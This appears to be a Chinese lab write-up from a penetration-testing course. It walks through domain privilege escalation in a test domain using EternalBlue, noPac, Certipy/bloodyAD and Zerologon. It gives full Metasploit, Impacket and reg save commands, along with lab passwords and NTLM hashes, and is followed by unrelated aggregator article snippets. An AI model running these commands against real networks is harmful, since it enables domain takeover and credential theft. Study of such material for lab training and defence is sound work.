第133天:内网安全-横向移动域控提权NetLogonADCSPACKDC永恒之蓝

案例一:横向移动-系统漏洞-CVE-2017-0146

这个漏洞就是大家熟悉的ms17-010,这里主要学习cs发送到msf,并且msf正向连接后续

原因是cs只能支持漏洞检测,而msf上有很多exp可以利用

注意msf不能使用4.5版本的有bug

这里还是反弹权限,然后提权到system

设置监听器

 msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 8888
exploit

转发msf上

转发到刚才的会话上

msf成功上线

这是3网段的主机,所以可以连接到3网段所有主机,但是需要设置路由

run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表

会话放入后台

 这里利用ms17-010的时候反向没有办法上线的,因为内网的主机不出网,只有正向去连接他

首先先检测是否有该漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.3.21-32 //设置扫描目标段

set threads 5 //设置扫描线程数

run

这里我的域控环境网段不是连续的,就扫描一个dc

可以利用,这里因为内网是不出网的所以需要借助已经拿到的机器,去控制目标主机,正向连接

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.3.25 //设置连接目标或者范围
run

本来是希望去控制域控主机的,但是域控主机似乎做了某种限制,这里我控制的是sqladmin

成功

msf正向连接中,设置了路由就可以,甚至不用上传木马,不知道是不是msf17-010的溢出不用

案例二:  横向移动-域控提权-CVE-2014-6324

在这篇文章里面复现过

第130天:内网安全-横向移动&PTH哈希&PTT 票据&PTK密匙&Kerberos&密码喷射-CSDN博客

案例三:横向移动-域控提权-CVE-2021-42287

前提条件:一个域内普通账号

影响版本:Windows基本全系列

这篇文章也复现过,这里还有不同的工具

第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_windows 提权漏洞补丁 ad域-CSDN博客

方法一:

同样先上线,代理转发

项目下载地址:
https://github.com/safebuffer/sam-the-admin

python3 sam_the_admin.py 域名/'域控主机账号:密码'  -dc-ip 域控ip -shell

python3 sam_the_admin.py 0day.org/'administrator:123.com' -dc-ip 192.168.3.142 -shell

查看获得的权限啊

方法二:

nopac下载地址: https://github.com/cube0x0/noPac

把这个文件导入到visual studio中

编译生成文件

在这个目录下会生成exe文件

 这里按理说应该设置代理在本地运行,我是linux系统没办法设置,直接上传本地运行

出现下面的提示代表有漏洞

noPac.exe scan -domain 0day.org -user jack -pass admin!@#45

生成票据

noPac.exe -domain 0day.org -user jack -pass admin!@#45 /dc 域控名  /mAccount 乱输一个用户名 -mPassword 乱输一个密码 /service 乱输一个服务 /ptt

noPac -domain 0day.org -user jack -pass admin!@#45 /dc owa2010sp3.0day.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt

PsExec \\owa2010cn-god.god.org cmd

现在查看票据里面就有一个administrator的票据

利用工具建立连接

psexec.exe \\域控主机名  cmd

案例四:WIN-域控提权-CVE-2022-26923

利用条件

一个域控内普通的账号密码

并且域控内有ca证书服务器

dnshostname不唯一

查看域内是否有证书服务器

certutil -config - -ping

没有的情况

如果有证书服务器

资源下载地址:GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse 

安装必要的插件

python3 setup.py install

首先先申请一个证书

certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca CA服务器名 -template User -debug

certipy req '192.168.3.142/jack:admin!@#45@OWA2010SP3.0day.org' -target-ip 192.168.3.142 -ca 0day-OWA2010SP3-CA -template User -debug

检测证书

certipy auth -pfx jack.pfx -dc-ip 192.168.3.142 -debug

添加计算机账号

项目地址:GitCode - 全球开发者的开源社区,开源代码托管平台

python3 bloodyAD.py -d 域控名 -u 普通用户名 -p '普通用户密码' --host 域控ip addComputer 计算机名 '计算机密码'

python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 addComputer pwnmachine 'CVEPassword1234*'

域控计算机中这台主机被成功添加了进去

这一步是需要将计算机名更新为与域控一样的名字,在这一步实验的过程中发现无法实现,原因是由于dnshostname在这个环境当中是唯一的

python3 bloodyAD.py -d 0day.org -u jack -p 'admin!@#45' --host 192.168.3.142 setAttribute 'CN=pwnmachine,CN=Computers,DC=0day,DC=org' dNSHostName '["OWA2010SP3.0day.org"]'

后续操作先看这篇文章把

第106天:权限提升-WIN 系统&AD域控&NetLogon&ADCS&PAC&KDC&CVE 漏洞_ad域控提权-CSDN博客

案例五:WIN-域控提权-CVE-2020-1472

影响范围以及利用条件

CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞,
影响 Windows Server 2008R2 至 Windows Server 2019 的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows

资源下载地址 

POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket

 获取计算机名,这里这条命令设置代理后,好像识别不出来这条命令无法执行,我只能设置在一个网段运行。。。,但是也有别的办法获取

nbtscan -v -h 192.168.3.21

 可以用这种方式获取计算机

 测试漏洞是否能够正常使用

python3 zerologon_tester.py OWA2010SP3 192.168.3.142

因为设置代理的话这里是一个一个数据包进行发送的,所以会比较慢。

清空密码凭证

python3 cve-2020-1472-exploit.py OWA2010SP3 192.168.3.142

利用impack套件导出hash

python3 secretsdump.py 0day.org/OWA2010SP3\$@192.168.3.142 -no-pass

导出hash,上面的admin是域控本地的admin而下面的是域控内的

 利用套件里面的wmiexec进行连接

python3 wmiexec.py Administrator@192.168.3.142 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

 

这中方式一般不要使用,会导致内网崩溃!!!,用完记得恢复hash

重置hash的方式:https://zhuanlan.zhihu.com/p/627855713

运行这三条命令

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

生成三个文件

这三个文件保存在本地,利用套件里面的secretdump文件恢复 ,但是他这个只能是在系统本地运行,系统不一定有python环境啊

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

利用powershell执行这条命令

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/408778.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于STM32开发的智能风扇控制系统

目录 引言环境准备工作 硬件准备软件安装与配置系统设计 系统架构硬件连接代码实现 系统初始化温度与湿度监测风扇控制与状态显示Wi-Fi通信与远程控制应用场景 家庭与办公室的温控风扇管理工业环境的智能通风控制常见问题及解决方案 常见问题解决方案结论 1. 引言 智能风扇控…

react笔记(React18)

以下笔记可能毫无章法,仅供个人学习记录使用。 关于状态提升: 状态提升适用于兄弟组件之间传递数据,共享状态,其实就是把两个兄弟组件要共同使用的数据存放到共同的父组件中,称状态提升。 关于context跨层级组件通信…

Vodafone 推出了与 Wi-Fi 竞争的基于树莓派私人5G技术

随着全球5G网络的逐步推出,在其过程中遇到了可预见的起起伏伏,并且蜂窝技术也开始进入另一个无线技术 Wi-Fi ,并且已经占据的市场。私有5G网络(即个人或公司建立自己的全设施蜂窝网络)如今正在寻找曾经属于Wi-Fi的唯一…

openai whisper使用

whisper使用 介绍 Whisper是一种通用的语音识别模型。它是在大量不同音频数据集上训练的,也是一个多任务模型,可以执行多语言语音识别、语音翻译和语言识别。 GitHub:https://github.com/openai/whisper 论文链接:https://arx…

SQL Server 2017上服务端设置强制加密启用SSL

在数据库服务端设置,强制所有客户端使用 SSL,设置完后,后续客户端所有连接,都将以密文传送,不论客户端是否指定安全连接(即EncryptTrue/False) 一、服务端强制加密使用 SSL 1.在数据库服务器上…

微服务事务管理

目录 一、分布式事务问题 1、本地事务 2、分布式事务 3、分布式事务问题 二、理论基础 1、CAP定理 (1)一致性 (2)可用性 (3)分区容错 (4)矛盾 2、BASE理论 3、解决分布式…

Java学习_21_多线程JUC

文章目录 前言多线程并发与并行多线程的实现方式Thread类Runnable接口Callable接口和Future接口 Thread类的相关方法线程对象线程优先级守护线程出让线程/礼让线程插入线程/插队线程 线程的相关问题生命周期安全问题Lock锁死锁等待唤醒机制(生产者和消费者&#xff…

Flex的基本使用+综合案例

组成 弹性盒子没有设置高&#xff0c;就会自动拉伸 <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8"><meta http-equiv"X-UA-Compatible" content"IEedge"><meta name"viewport&q…

GCB | 首次揭示!气候变化对常绿和落叶植物物候差异化影响的机制

气候变化引起的植物物候改变已对全球范围内生物多样性和生态系统产生重大影响&#xff08;Nature高引文章 | 北京大学朴世龙院士等&#xff1a;全球变暖对植被物候的影响及其机制&#xff1b;Nature Ecology & Evolution | 南京大学张永光教授团队揭示延长的植被物候期受CO…

【日记】狗尾巴草与暗恋(1519 字)

写在前面 消极内容注意 正文 好想吃火龙果。 下周会变得异常艰难。因为事情已经垒到天上去了&#xff0c;还要来检查。 上午&#xff0c;同事送了一点水果&#xff0c;我从来没见过。问了一下别人&#xff0c;有的说是灯笼果&#xff0c;有的说是菇凉果、姑娘果。搜了一下&am…

go const(常量)

常量介绍 示例 package mainimport ("fmt" )func main() {const name "tom"fmt.Println(name)const tax float64 0.8fmt.Println(tax) }go run const.go tom 0.8package mainimport ("fmt" )func main() {const a intfmt.Println(a) }go run…

【Excal】OR 函数

语法&#xff1a; OR&#xff08;判断条件1&#xff0c;判断条件2&#xff0c;判断体件3&#xff0c;****&#xff09; 评优条件&#xff1a; 语文成绩高于90 数学成绩高于90 英语成绩高于85 物理成绩高于85 点击回车键 选中填充 回车 选中填充

SpringBootWeb 篇-深入了解 SpringBoot + Vue 的前后端分离项目部署上线与 Nginx 配置文件结构

&#x1f525;博客主页&#xff1a; 【小扳_-CSDN博客】 ❤感谢大家点赞&#x1f44d;收藏⭐评论✍ 文章目录 1.0 云服务器的准备 2.0 Xshell 和 Xftp 软件 2.1 Xshell 介绍 2.2 Xftp 介绍 3.0 在云服务器进行环境配置 3.1 安装 JDK 3.2 安装 MySQL 3.3 安装 Nginx 4.0 SpringB…

论文降重,Kimi如何助你一臂之力?

在学术研究的浪潮中&#xff0c;原创性和学术诚信是每位研究者必须坚守的灯塔。然而&#xff0c;随着研究领域的不断扩展和深化&#xff0c;论文写作过程中难免会遇到内容重复的问题&#xff0c;这不仅影响论文的独创性&#xff0c;也对学术声誉构成挑战。本文将介绍Kimi的核心…

darnet 识别检测本地视频 保存本地视频

darnet 识别检测本地视频 保存本地视频 darknet的github下载 darknet的github下载 darknet地址 将这个下载后&#xff0c;保存在catkin_ws的src目录下

红黑树、B+Tree、B—Tree

红黑树 B-Tree 这三个通常都是把内存全部加载到内存里,然后再内存中进行处理的,数据量通常不会很大。 内存一般容量都在GB级别,比如说现在常见的4G、8G或者16G。 如果要处理的数据规模非常大,大到内存根本存不下的时候。这个时候只能先存到硬盘里,硬盘呢 容量又比内存大…

谈一谈什么是接口测试?怎样做接口测试?

扫盲内容&#xff1a; 1.什么是接口&#xff1f; 2.接口都有哪些类型&#xff1f; 3.接口的本质是什么&#xff1f; 4.什么是接口测试&#xff1f; 5.问什么要做接口测试&#xff1f; 6.怎样做接口测试&#xff1f; 7.接口测测试点是什么&#xff1f; 8.接口测试都要掌…

mysql数据库----简单认识库的操作

目录 1.区分概念 2.什么是数据库 3.数据库的创建和销毁 4.数据库编码初识 5.查询系统默认编码配置 6.两个查询编码表的指令 7.创建指定编码的数据库 8.不同编码的区别 第一个编码方式&#xff1a; 第二个编码方式&#xff1a; 查询结果说明&#xff1a; 9.数据库的增…

React学习day01-React-开发环境配置、JSX基础-本质、JSX中js表达式的用法、JSX的条件渲染

1、React &#xff08;1&#xff09;概念&#xff1a;由Meta公司研发&#xff0c;是一个用于构建Web和原生交互页面的库 &#xff08;2&#xff09;优点&#xff1a; 1&#xff09;相较于传统基于DOM开发的优势&#xff1a;组件化的开发方式、不错的性能 2&#xff09;相较于…

QT实例1--使用UI文件创建登陆窗口

基础信息 平台&#xff1a;window 10 QT版本 &#xff1a;5.14.2 时间:2024.08.25 本工程是QLayout专题,使用UI文件创建一个登陆窗体 本例程原始资料来源于B站&#xff0c;UP主“爱编程的大丙”的视频教程《QT开发编程-入门基础教程QT5–6.2窗口布局举例-制作一个登陆界面》…